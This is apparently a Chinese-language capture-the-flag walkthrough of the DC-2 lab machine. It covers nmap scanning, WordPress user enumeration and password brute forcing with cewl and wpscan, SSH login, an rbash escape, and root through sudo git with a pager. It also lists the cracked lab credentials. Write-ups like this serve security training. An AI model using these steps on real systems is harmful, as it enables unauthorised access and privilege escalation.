DC-2靶机渗透
1. 渗透过程
主机发现:
nmap -sP 192.168.0.1/24
发现了DC-2的IP地址:
192.168.0.131
下载主机的时候要添加dns到hosts文件
echo “192.168.0.131 dc-2 ” >> /etc/hosts
添加好了 ping一下 dc-2,ping 通了表示成功了
接下来就是端口发现了:
nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
- 结果:
# Nmap 7.70 scan initiated Mon Apr 27 14:28:47 2020 as: nmap -sS -A -p- -oN /tmp/DC-2.txt 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up (0.00033s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:F6:92:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 192.168.0.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 27 14:29:04 2020 -- 1 IP address (1 host up) scanned in 17.46 seconds
只有7744(ssh) 和 80 (http)
先看看http的
发现是一个
wordpress
框架还找到一个flag页面
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
#标志1:
#你通常的单词表可能不起作用,所以,也许你只需要试试cewl。
#密码越多越好,但有时你不能赢得所有的密码。
#作为一个登录以查看下一个标志。
#如果找不到,请以另一个身份登录。
- 提示是用
cewl
生成密码文件
cewl -w /tmp/passwd.lst http://dc-2
然后用这个密码来爆破
当然
wordpress
可以枚举用户名的这里我们用
wpscan
来扫面#先扫描用户
wpscan --url https://dc-2/ --enumerate u找到用户名:
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
用户名:admin、jerry、tom
然后爆破其密码:(密码本就是刚刚我们用cewl生成的)
wpscan --url http://dc-2 --usernames admin,jerry,tom --passwords /tmp/passwd.lst
就扫面出来了两个密码
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient现在就是登陆后台拿shell了
当然知道点wordpress的都知道
http://dc-2/wp-admin/
就能登录后台不知道的爆破一下目录也可以哦
然后就随便登录了一个
在page里面发现了 flag 2
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
标志2:
如果你不能利用WordPress并抄近路,还有别的办法。
希望你能找到另一个切入点。
看了一圈,也用msf搞了一顿~
还是没能拿到shell
还有别的办法?
那只有ssh了
前面扫到ssh在7744端口
那我们就连用这两个网站密码连一下看看
ssh jerry@dc-2 -p 7744
发现登不进去 权限不足?
再试试tom
ssh tom@dc-2 -p 7744
这个能登进去
但是~
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$
tom@DC-2:~$
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat
-rbash: cat: command not found
tom@DC-2:~$ sudo
-rbash: sudo: command not found
连cat都被限制了
只能搞到我的kali机器看看了
先看看有没有scp
有~
scp flag3.txt root@192.168.0.21:/tmp
- 然后输入以下密码就OK了
root@kali:/tmp# cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
#可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力而宽慰。
现在限制了好多命令,而且启的还是rbash
echo $SHELL
可以看当前使用的shell那我们切换到bash看看行不
BASH_CMDS[a]=/bin/sh;a #(百度到这个可以还个零临时的用用)
# 换了之后还是没有命令?看看环境变量
echo $PATH
/home/tom/usr/bin
export PATH=$PATH:/bin:/usr/bin
#自己设置一下环境变量
su jerry #切换到jerry
进了,还看到了flag4~
我们先看看flag4写的什么
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
大概意思就是说用git离开这里~
我们还是先看看
history sudo -l ...
这些命令
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
可以无密码使用root执行git
这个我也不咋会用
百度的到一个说是有个缓冲区漏洞
git 开启分页的时候可以输入命令启bash
jerry@DC-2:~$ sudo git -p config
usage: git config [options]
Config file location
--global use global config file
--system use system config file
--local use repository config file
-f, --file <file> use given config file
--blob <blob-id> read config from given blob object
Action
--get get value: name [value-regex]
--get-all get all values: key [value-regex]
--get-regexp get values for regexp: name-regex [value-regex]
--get-urlmatch get value specific for the URL: section[.var] URL
--replace-all replace all matching variables: name value [value_regex]
--add add a new variable: name value
--unset remove a variable: name [value-regex]
--unset-all remove all matches: name [value-regex]
--rename-section rename section: old-name new-name
--remove-section remove a section: name
-l, --list list all
-e, --edit open an editor
--get-color <slot> find the color configured: [default]
--get-colorbool <slot>
find the color setting: [stdout-is-tty]
!bash
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:/home/jerry#
要记得把屏幕缩小来哦要不然就不会出现分页了~
这样就拿到了root权限了
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a twet via @DCAU7.
!!!THE_ENT!!!
2. 重要信息
# 1. 网站后台密码
user1:tom
passwd:parturient
user2:jerry
passwd:adipiscing
# 后来在网站目录下搞到的
define('DB_NAME', 'wordpressdb');
/** MySQL database username */
define('DB_USER', 'wpadmin');
/** MySQL database password */
define('DB_PASSWORD', '4uTiLL');